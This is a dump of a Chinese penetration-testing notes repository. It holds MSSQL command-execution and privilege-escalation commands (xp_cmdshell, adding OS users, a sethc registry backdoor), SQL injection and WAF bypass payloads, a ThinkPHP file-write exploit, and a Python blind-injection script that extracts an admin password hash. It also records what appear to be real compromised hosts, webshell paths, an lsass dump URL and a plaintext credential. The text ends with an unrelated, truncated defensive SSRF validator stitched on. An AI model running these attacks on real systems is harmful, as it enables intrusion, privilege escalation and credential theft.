[OLE/DB provider returned message: 找不到文件 'C:\WINDOWS\system32\ias\dnary1.mdb'。]
OLE DB 错误跟踪[OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: ]。

3. If extra spaces crept in while typing, it also errors out. Pay special attention to this, because many people copy and paste straight from articles found online.
服务器: 消息 7357,级别 16,状态 2,行 1
未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object has nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

4. If the permissions on the mdb and on cmd.exe are wrong, there are problems as well.
When the mdb permissions are wrong:
服务器: 消息 7320,级别 16,状态 2,行 1
未能对 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查询。
[OLE/DB provider returned message: 未知]
OLE DB 错误跟踪[OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14]。

5. If the permissions on net are wrong, there is no message at all.
The final privilege-escalation method is to upload the system's ias.mdb together with cmd.exe and net.exe, three files, into the current web directory.
Execute select * from openrowset('microsoft.jet.oledb.4.0',';database=E:\web\ias.mdb','select shell("E:\web\cmd.exe /c E:\web\net.exe user user passwd /add")')
and a computer user is added successfully.



Splitting cmdshell to evade IDS
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'ipconfig'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'


Editing the registry to hijack the shift key (sethc)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

Query linked servers
select srvid,srvstatus,srvname,srvproduct,providername,datasource,location,schemadate,catalog,srvnetname,isremote,rpc,dataaccess from master.dbo.sysservers

Query linked servers 2
select distinct hostname,db_name(dbid),net_address,loginame,program_name from master..sysprocesses

Query the logins on a linked server
select * from [192.168.1.1].master.dbo.syslogins

Query all databases on a linked server
select * from linkedSrvWeb.master.dbo.sysdatabases

Execute an extended stored procedure on a linked server
exec [ip].master.dbo.xp_cmdshell

Query all tables on a linked server
select * from [ip].master.dbo.sysobjects




select * from openrowset('sqloledb','server=IP;uid=用户;pwd=密码','select @@version')

select * from openquery([LINKSERVER名称],'select @@version')


select * from openquery(NDOORS,'select IS_SRVROLEMEMBER(''sysadmin'')')


select * from openquery(GM_SERVER,'select * from sysobjects where xtype = (''U'')')

select * from openquery(NDOORS,'Select IS_MEMBER(''db_owner'')')


select * from openquery(toatdeweb,'select srvname from master.dbo.sysservers')

insert into opendatasource('sqloledb','server=222.241.95.12;uid=scd;pwd=a123520;database=hack520').hack520.dbo.zhu select name from master.dbo.sysdatabases
create database hack520 Create TABLE zhu(name nvarchar(256) null);Create TABLE J8(id int NULL,name nvarchar(256) null);

select * from openquery(toatdeweb,'set fmtonly off exec master.dbo.xp_cmdshell ''net user''')

exec master..xp_dirtree 'c:\',1,1    list a directory

exec links.master..xp_cmdshell 'ipconfig'

select * from openquery(toatdeweb,'set fmtonly off exec master.dbo.xp_cmdshell ''ipconfig /all''')

Connect to mysql: Select * from Mem_DB.UserDB.dbo.AdminList

EXEC MASTER..XP_dirtree 'c:\',1,1


Exec master.dbo.xp_cmdshell 'dir '

select count(*) from [表名]    how many rows the current table holds


select distinct hostname,db_name(dbid),net_address,loginame,program_name from master..sysprocesses



select * from gamedb01.Server01.dbo.cabal_character_table where name='猪'


When you try to delete it you get: the database is in use and cannot be deleted.

Click the database you want to delete and open the event viewer.

Enter:

use master
go
then enter the following:
declare @d varchar(8000)
set @d= ' '
select @d=@d+ ' kill '+cast(spid as varchar)+char(13)
from master..sysprocesses where dbid=db_id( '库名 ')
exec(@d)
-- use this code first to kill the processes connected to the database






MSSQL accessing Oracle through a linked server



1) Install the Oracle 9i client on the SQL Server 2005 server. Assume it is installed to the C:\ora92i\ directory. If D: is an NTFS partition, the ORACLE installation directory must be set so that the user in use may run, add and delete.

2) Configure the file C:\ora92i\network\ADMIN\tnsnames.ora. (The text below is an example configuration)

ORCL=
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.0.11)(PORT= 1521))
    )
    (CONNECT_DATA =
      (SERVICE_NAME = orcl)
    )
  )

3) Run the following command in a DOS window to confirm that the ORACLE client is installed correctly.

sqlplus user/password@ORCL

4) Open Start - Control Panel - Services and confirm that the Distributed Transaction Coordinator service is started.

5) Open SQL SERVER Management Studio, instance name (ORCL) - Server Objects (right-click) - New Linked Server.

1. Linked server: enter the name of the linked server, e.g. OracleTest

2. Server type: choose Other data source

3. Provider: choose Oracle Provider for OLE DB

4. Product name: enter Oracle

5. Data source: enter the service name configured in tnsnames.ora, e.g. ORCL

6. Provider string: userid=sys as sysdba;password=password

7. On the Security page, "Be made using this security context":

a) Remote login: user (another user, not sys)

b) With password: password

8. Under local login set "NT AUTHORITY\SYSTEM", remote user sys, and set the password

9. OK

6) There are two ways to write the SQL

a) Using T-SQL syntax:

SELECT * FROM OraTest.ERP.BAS_ITEM_CLASS

Note: when entering SQL statements in Query Analyzer, mind the full-width/half-width switching of Chinese input!

b) Using PL/SQL syntax:
SELECT * FROM openquery(OraTest,'SELECT * FROM OraTest.ERP.BAS_ITEM_CLASS ')

c) The second access method is about 50% faster than the first; the second is about as fast as a direct connection to ORACLE; the first may cause some unexpected errors, such as:
the table does not exist, or the current user has no permission to access the table, and so on.

d) If a column being accessed uses a data type without precision, both query methods may raise an error; this is an ORACLE bug that cannot be fixed and can only be worked around by special handling in the query statement:
OLE DB 提供程序 'OraOLEDB.Oracle' 为列提供的元数据不一致。执行时更改了元数据信息。





MSSQL: adding and deleting users and granting privileges

use 你的库名
go
-- Add a user
exec sp_addlogin 'test' -- add a login
exec sp_grantdbaccess N'test' -- make it a legitimate user of the current database
exec sp_addrolemember N'db_owner', N'test' -- grant all privileges on its own database
-- A user created this way can only access its own database, plus the public tables of databases that contain the guest user
go
-- Delete the test user
exec sp_revokedbaccess N'test' -- remove access to the database
exec sp_droplogin N'test' -- delete the login
If you create it in Enterprise Manager instead, use:
Enterprise Manager - Security - right-click Logins - New Login
General tab
-- enter the user name under Name
-- choose the authentication mode you need (for Windows authentication, first create the user among the operating system's users)
-- under Defaults, choose the database the new user is to access
Server Roles tab
do not select anything here
Database Access tab
tick the databases the user you created needs to access
under Database roles, tick "public" and "db_owner"
OK; a user built this way is the same as one created with the statements above
---------------------------------------------------------------------------
The last step is to set specific access permissions for specific users; see the minimal example below:
-- Add a user who may only access a specified table:
exec sp_addlogin '用户名','密码','默认数据库名'
-- add to the database
exec sp_grantdbaccess '用户名'
-- grant permissions on the whole table
GRANT SELECT , INSERT , UPDATE , DELETE ON table1 TO [用户名]
-- grant permissions on specific columns
GRANT SELECT , UPDATE ON table1(id,AA) TO [用户名]
-------------------------------------------------------------------
For the specific security settings and theory, refer to SQL Books Online



| Fixed database role | Description |
| --- | --- |
| db_owner | Has all permissions in the database. |
| db_accessadmin | Can add or remove user IDs. |
| db_securityadmin | Can manage all permissions, object ownership, roles and role membership. |
| db_ddladmin | Can issue ALL DDL, but cannot issue GRANT, REVOKE or DENY statements. |
| db_backupoperator | Can issue DBCC, CHECKPOINT and BACKUP statements. |
| db_datareader | Can select all data from any user table in the database. |
| db_datawriter | Can modify all data in any user table in the database. |
| db_denydatareader | Cannot select any data from any user table in the database. |
| db_denydatawriter | Cannot modify any data in any user table in the database. |


You should choose db_datareader, db_datawriter, db_accessadmin


5. After the SQL Server instance has been started in single-user mode, a Windows administrator account can use the sqlcmd tool to connect to SQL Server under Windows authentication. You can use T-SQL commands such as "sp_addsrvrolemember" to add an existing login, or a newly created one, to the sysadmin server role. Example statement:

EXEC sp_addsrvrolemember 'CONTOSO\Buck', 'sysadmin';

GO

Adds a user with sysadmin privileges




(1) Managing server roles

In SQL Server, role management is implemented mainly by two stored procedures:

sp_addsrvrolemember and sp_dropsrvrolemember

sp_addsrvrolemember adds a login to a server role, making it a member of that role. Syntax:
sp_addsrvrolemember login , role

sp_dropsrvrolemember removes a login from a server role; once removed, the member no longer has the permissions granted by that server role. Syntax:
sp_dropsrvrolemember [@loginname=]'login',[@rolename=]'role'

where @loginname is the login name and @rolename is the server role.


(2) Managing database roles

In SQL Server, six stored procedures support database role management; their meaning and syntax are as follows:

sp_addrole: creates a new database role;
sp_addrole role, owner

sp_droprole: removes a database role from the current database;
sp_droprole role

sp_helprole: shows full information on all database roles in the current database;
sp_helprole ['role']

sp_addrolemember: adds a database user to a database role; the role may be a user-defined standard role or a fixed database role, but not an application role.
sp_addrolemember role, security_account

sp_droprolemember: removes a user from a role;
sp_droprolemember role, security_account

sp_helprolemember: shows all members of a database role.
sp_helprolemember ['role']
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/SQLServer注入WAF绕过.md:
--------------------------------------------------------------------------------
Three ways to execute commands
```
xp_cmdshell
sp_oacreate
clr
```

```
execute('declare @s varchar(2000) set @s=0x657865632073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b7265636f6e6669677572653b657865632073705f636f6e666967757265202778705f636d647368656c6c272c20313b7265636f6e6669677572653b657865632078705f636d647368656c6c202763616c6327 exec(@s)') -- DBeM
```
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/0.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/1.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/2.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/readme.md:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql waf绕过检测利用/readme.md:
--------------------------------------------------------------------------------
# 0. Case-based WAF bypass
Try upper and lower case for each character

# 1. WAF bypass when spaces are blocked
There are 5 common positions: select * from admin where id=1[position 1]union[position 2]select[position 3]1,2,db_name()[position 4]from[position 5]admin

Testing shows that in MSSQL a keyword may directly follow the preceding value with no space in between, but may not be directly followed by the next value without a space

## 1.1 WAF bypass when spaces are blocked: use a comment in place of the space
```
select session_id,command from sys.dm_exec_requests where session_id=12/**/and/**/1=@@VERSION;
```
As shown below
![image](./pic/0.png)
## 1.2 WAF bypass when spaces are blocked: use %00-%1F in place of the space
%20 is itself the URL encoding of a space, so it cannot bypass the WAF

## Correcting misinformation found online
1. Some claim that a floating-point number can act as a space; testing shows that a float used as a space does not raise an error, but the result is not displayed correctly, as shown below
![image](./pic/1.png)

Reference:
https://www.cnblogs.com/xiaozi/p/6930013.html

# 2. WAF bypass when keywords are blocked
## Correcting misinformation found online
In MSSQL, && cannot be used in place of and, nor || in place of or; tested on mssql 2008 r2 as shown below:
![image](./pic/2.png)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/0.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/1.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/2.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/3.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/4.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/pic/readme.md:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mssql基本检测利用/readme.md:
--------------------------------------------------------------------------------
### 0. Stacked query + time-based blind: check whether the vulnerability exists
```
select session_id from sys.dm_exec_requests where session_id=12; waitfor delay '0:0:5'--
```
![image](./pic/0.png)

### 1. Error-based injection: query the database version
```
select session_id,command from sys.dm_exec_requests where session_id=12 or 1=@@VERSION;
```
![image](./pic/1.png)

### 2. Stacked query + time-based blind: check whether the current user is a dba
```
select session_id,command from sys.dm_exec_requests where session_id=12;if(1=(select is_srvrolemember('sysadmin'))) waitfor delay '0:0:5'--
```
![image](./pic/2.png)

### 3. Stacked query + time-based blind: check whether the web server and database server are separated
```
select session_id from sys.dm_exec_requests where session_id=12;if(host_name()=@@servername)waitfor delay '0:0:5';--

--host_name(): the computer name of the workstation that connected to the database management system
--@@servername: the computer name of the machine the database management system runs on
--References:
--https://docs.microsoft.com/en-us/sql/t-sql/functions/host-name-transact-sql?view=sql-server-ver15
--https://docs.microsoft.com/en-us/sql/t-sql/functions/servername-transact-sql?view=sql-server-ver15
```
![image](./pic/3.png)

### 4. Stacked query + time-based blind: check whether xp_cmdshell is enabled
```
select session_id from sys.dm_exec_requests where session_id=12;if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5'--

--Enable xp_cmdshell:
--EXEC sp_configure 'show advanced options',1;
--RECONFIGURE;
--EXEC sp_configure 'xp_cmdshell',1;
--RECONFIGURE;

--Disable xp_cmdshell:
--EXEC sp_configure 'show advanced options',1;
--RECONFIGURE;
--EXEC sp_configure 'xp_cmdshell',0;
--RECONFIGURE;

--Add xp_cmdshell:
--exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

--Remove xp_cmdshell:
--exec sp_dropextendedproc 'xplog70.dll'
```
![image](./pic/4.png)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql-time-blind-kkcms-exp/mysql-time-blind-kkcms-exp.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

import requests
import sys
import time

def do_request(url, guess_char, payload_var):
    # Time-based condition on character guess_char of the first m_password value; sleep(5) fires when it equals payload_var
    payload = "abc'and if((ascii(substring((select m_password from xtcms_manager limit 1)," + str(guess_char) + ",1))=" + str(payload_var) + "),sleep(5),1)#"
    r = requests.post(url, data={"name": payload, "email": "", "submit": ""}, timeout=35)
    return r.elapsed.total_seconds()

def main():
    if len(sys.argv) != 2:
        print("Usage: below example is from ubuntu")
        print("Usage: python3 time-blind-php-mysql-kkcms-exp.py http://www.example.com")
        sys.exit()
    else:
        url = sys.argv[1]

    # Define the brute-force character set; an md5 string contains only lowercase letters and digits, so only those are defined
    char_set = []
    for i in range(97, 123):
        char_set.append(i)
    for j in range(48, 58):
        char_set.append(j)
    # print(char_set)

    start_time = time.asctime(time.localtime(time.time()))
    print("Starting time is: " + start_time)

    success_string = "e10adc3949ba59abbe56e057f20f88"
    count = 31
    for m in range(31, 33):
        for k in char_set:
            print(" Guessing the char " + chr(k) + " ...")
            elapsed = do_request(url, m, k)
            # Threshold as written by the author: a response slower than 20 s moves on to the next candidate
            if elapsed > 20.0:
                continue
            else:
                print(" Bruted the char" + str(count) + ": " + chr(k))
                success_string += chr(k)
                break
        count += 1
    print("The final string is: " + success_string)

    end_time = time.asctime(time.localtime(time.time()))
    print("Ending time is: " + end_time)

main()
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql-time-blind-kkcms-exp/readme.md:
--------------------------------------------------------------------------------
I wrote this exp earlier while hunting a CNVD vulnerability, to verify the vulnerability
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql注入waf绕过/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/0.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql注入waf绕过/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/1.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql注入waf绕过/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/2.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/mysql注入waf绕过/readme.md:
--------------------------------------------------------------------------------
1. Inline comments
Note: an inline comment cannot be nested inside another inline comment
```
/*!*/
Explanation: for compatibility with other databases, mysql puts MySQL-specific syntax inside this form, e.g. /*!STRAIGHT_JOIN*/; other databases treat it as a comment, but mysql parses and executes it
```
```
/*!50110STRAIGHT_JOIN*/
Explanation: this statement is executed only when the mysql version is greater than or equal to 5.1.10
```
References:
https://blog.csdn.net/herojuice/article/details/85136922
https://www.cnblogs.com/itcomputer/articles/5253263.html
https://dev.mysql.com/doc/refman/5.7/en/comments.html
Worked example:
https://mp.weixin.qq.com/s/84se5CxYlVT05bcw654wKg    this article uses the technique above to bypass Mod_Security

2. Finding substitutes
2.1. && can be used in place of and, as shown below
![image](./0.png)
2.2. true can be used in place of and 1=1, and false in place of and 1=2, as shown below
![image](./1.png)

3. Splitting keywords with comments
```
database/**/() can be used in place of database()
```
As shown below
![image](./2.png)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/sql注入中的dios/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/0.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/sql注入中的dios/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/1.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/sql注入中的dios/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/2.png
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/sql注入中的dios/3.png:
-------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/readme.md: --------------------------------------------------------------------------------
I first saw DIOS in https://mp.weixin.qq.com/s/84se5CxYlVT05bcw654wKg; it looked impressive, so I went looking for more material on it

Conclusion first (my own understanding): it is not a new way of exploiting SQL injection, only a convenient way of extracting all the data in a single statement

# Get all database names:
```
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
'))))a);
```
![image](./0.png)
Explanation:
Three things to know first:
1. @a is a SQL user variable; expressions involving it must be wrapped in parentheses
2. := is the SQL assignment operator
3. The SQL function concat has the property that if any argument is NULL the result is NULL, so select(@a:=0x00) has to be executed first
Starting from the innermost layer:
```
(@a:=concat(@a,schema_name,'
'))
```
Concatenates the values of these 3 arguments
Second layer from the inside; the statement is now:
```
(select (@a) from ( information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
')) )
```
The usual where in usage looks like: select x from y where x in (1,2,3), i.e. select column x from table y where the value of x is in (1,2,3)
This statement is not the usual where in usage, however: it appends each schema_name value in information_schema.schemata to the variable @a in turn
Third layer from the inside; the statement is now:
```
(select (@a) from (select(@a:=0x00),expr1)a);
```
Simplifying one step further:
```
(select (@a) from (expr2)a);
```
This statement simply means: select the value of @a
At this point the value of @a is as follows
![image](./1.png)
At this point the value of
```
(select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
'))));
```
is as follows
![image](./2.png)

# Get all table names and column names of a given database
```
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(table_schema='anyisec')and(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a);
```
![image](./3.png)

References:
http://blog.dreamfever.me/2016/04/20/dump-in-one-shot/
http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-2.html
http://securityidiots.com/Web-Pentest/SQL-Injection/DIOS-the-SQL-Injectors-Weapon-Upgraded.html
-------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/单引号过滤绕过方式/readme.md: --------------------------------------------------------------------------------
```
Use hexadecimal literals in place of string literals
```
Reference:
https://xz.aliyun.com/t/9367
-------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/各种语言注释总结/readme.md: --------------------------------------------------------------------------------
# Visual Basic comments (2 kinds):
```
'
rem
```
Reference:
https://docs.microsoft.com/zh-cn/dotnet/visual-basic/programming-guide/program-structure/comments-in-code
# Visual Basic Script comments (1 kind):
```
'
```
Reference:
https://www.cnblogs.com/liuzhengliang/archive/2006/11/22/568629.html

# PHP comments (3 kinds):
```
#
//
/**/
```
Reference:
https://www.php.net/manual/zh/language.basic-syntax.comments.php

# MySQL comments (3 kinds):
```
#
--+
/**/
```
Reference:
https://dev.mysql.com/doc/refman/5.7/en/comments.html

# SQL Server comments (2 kinds):
```
--
/**/
```
References:
https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comment-transact-sql?view=sql-server-2016
https://blog.sqlauthority.com/2007/08/03/sql-server-two-different-ways-to-comment-code-explanation-and-example/


# Access comments:
```
Access has no comment delimiter
```
References:
https://www.teagle.top/index.php/archives/147/
https://bbs.csdn.net/topics/80515067
-------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/宽字节注入特性/readme.md: --------------------------------------------------------------------------------
```
When the target is protected with addslashes and the database character set is not UTF-8, consider whether wide-byte injection is possible; it is not limited to GBK and can also occur with GB2312 and similar character sets
```
-------------------------------------------------------------------------------- /04-漏洞利用/SSRF漏洞WAF绕过.md: --------------------------------------------------------------------------------
https://portswigger.net/web-security/ssrf

How SSRF works: the server-side application is induced to make an HTTP request to an arbitrary address chosen by the attacker

SSRF impact 1: bypassing access controls on the local server
Corresponding exploitation: request http://localhost/admin/ directly
Scenario 1: the access control is a separate component that sits in front of the application server
Scenario 2: for disaster-recovery reasons, requests arriving via the loopback interface are not authenticated
Scenario 3:
(not clear to me) The administrative interface might be listening on a different port number than the main application, and so might not be reachable directly by users.

SSRF impact 2: bypassing access controls on back-end systems
Corresponding exploitation: first scan the /24 range for hosts with 80 or 8080 open, then request http://ip:port/admin/


SSRF defence 1: blacklist-based filter
Bypass idea 1: try case variation and URL encoding (open question: is URL decoding performed before the filter?)
Bypass idea 2: try alternative forms of 127.0.0.1, such as 127.1, 2130706433, 017700000001, 169.xxx.xxx.xxx
Bypass idea 3: register your own domain and point it at 127.0.0.1
-------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/ThinkPHP文件写入WAF绕过.md: --------------------------------------------------------------------------------
A small WAF-bypass trick for getting a shell on ThinkPHP

# POC
Take the following POC as an example
```
POST /?s=captcha&test=-1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Type: application/x-www-form-urlencoded

s=file_put_contents('system.php','')&_method=__construct&method=POST&filter[]=assert
```

# How it works
![image](./01.png)
The official documentation notes that when base64_decode is called without its second parameter $strict, characters outside the base64 alphabet are ignored, so this can be used to insert large amounts of junk characters

# Practice
Ubuntu 22.04 + 宝塔 panel (Nginx 1.24.0 + PHP 5.6.40)

First test with legal base64 characters; the code is as follows
After visiting it, the output is as shown below
![image](./02.png)

Test inserting illegal base64 characters
After visiting it, the output is as shown below
![image](./03.png)

Test inserting one million illegal base64 characters; the Python script is as follows
```
# Write one million '*' characters, none of which is in the base64 alphabet
with open("a.txt", "w") as fw:
    for i in range(1000000):
        fw.write("*")
```
The code is as follows
![image](./04.png)
After visiting it, the output is as shown below
![image](./05.png)
-------------------------------------------------------------------------------- /04-漏洞利用/WebLogic写入WebShell路径记录.md: --------------------------------------------------------------------------------
```
D:/OracleWeblogic12/Middleware/Oracle_Home/wlserver/server/lib/consoleapp/webapp/images/
http://182.131.125.206:8005/console/images/aaccvv1.jsp

D:/weblogic/user_projects/domains/YNYDYXPri/servers/Server-0/tmp/_WL_internal/bea_wls_internal/o6fxc0/war/DumpHash.exe-lsass.dmp
http://218.89.146.78:7011/bea_wls_internal/DumpHash.exe-lsass.dmp

D:/weblogic/user_projects/domains/YNYDYXPri/servers/Server-0/tmp/_WL_internal/bea_wls_internal/o6fxc0/war/
http://218.89.146.78:7011/bea_wls_internal/acc
```
-------------------------------------------------------------------------------- /04-漏洞利用/XXL-JOB渗透简单记录.md: --------------------------------------------------------------------------------
A colleague had already finished the attack and sent me a screenshot; I went to verify it

Logged into the back end with admin 123456

Following the online tutorials I tried a reverse shell and got no response. Further reading suggested the target server might have no outbound access; in that case the result can be read from the logs, so I ran commands such as whoami and checked the dispatch log for the output, but the verification kept failing with the following error:

Cannot run program "bash": CreateProcess error=2, 系统找不到指定的文件。

Yet the screenshot my colleague gave me was clearly a Linux system

Just to see, I selected powershell and it actually worked. Anything really is possible; my guess is that the back end is a cluster, with some executors on Linux and some on Windows

References:
https://mp.weixin.qq.com/s/t0aDztXr9KNwop_Je5ot4Q
https://mp.weixin.qq.com/s/vUr4kLQ88coHxxLbb-ZwxA
https://mp.weixin.qq.com/s/AKufROJaT6DLDqyykslrAg
-------------------------------------------------------------------------------- /04-漏洞利用/Yapi代码执行WAF绕过.md: --------------------------------------------------------------------------------
Reference: https://mp.weixin.qq.com/s/yQ-s1w9yDCWEKTQE57NP6w

Core point of the article: use spawnSync in place of execSync, which the WAF blocks
-------------------------------------------------------------------------------- /04-漏洞利用/YonYou NC路径记录.md: --------------------------------------------------------------------------------
```
Command execution directory: E:\IBM\WebSphere\AppServer\profiles\App65

Web directory: dir ..\\..\\..\\..\\..\\nc65home\\webapps\\nc_web

e:\nc65home\webapps\nc_web
```
-------------------------------------------------------------------------------- /04-漏洞利用/基于楔形文字的XSS WAF绕过/readme.md: --------------------------------------------------------------------------------
Can bypass detection based on the keyword "alert"

Create a file xss.html with the following content
The result is shown below
![image](./pic/0.png)
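The SSRF notes above list the ways a blacklist of literal strings fails: case and URL-encoding games, alternative spellings of 127.0.0.1 such as 127.1, 2130706433 and 017700000001, and an attacker-controlled domain that resolves to loopback. As an added example (not code from this repository), the Python below validates a fetch destination the way such a filter should: numeric hosts are canonicalised with inet_aton's parsing rules, percent-encoded hosts are refused, names are resolved and every returned address is checked, and the caller is handed the address that was checked. The fake_resolver zone and the blocked-network list are constructed for the demonstration.

```python
import ipaddress
import socket
from typing import Callable, List, NamedTuple, Optional, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


class Verdict(NamedTuple):
    allowed: bool
    reason: str
    address: Optional[str]  # the address that was checked: connect to it, do not re-resolve


# RFC 1918 and carrier-grade NAT ranges; extend the list for your own environment.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10", "fc00::/7")]


def _c_int(part: str) -> Optional[int]:
    """Parse one dotted component as inet_aton(3) does: 0x.. hex, 0.. octal, else decimal."""
    if not part or not all(c in "0123456789abcdefABCDEFxX" for c in part):
        return None
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16) if len(part) > 2 else None
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def canonical_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Canonicalise the spellings inet_aton accepts but ipaddress rejects
    (127.1, 2130706433, 017700000001, 0x7f000001); None when host is not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_c_int(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    missing = 4 - len(lead)                   # the last component fills the remaining bytes
    if any(v > 255 for v in lead) or last >= 1 << (8 * missing):
        return None
    packed = b"".join(v.to_bytes(1, "big") for v in lead) + last.to_bytes(missing, "big")
    return ipaddress.IPv4Address(packed)


def is_disallowed(ip: IPAddress) -> bool:
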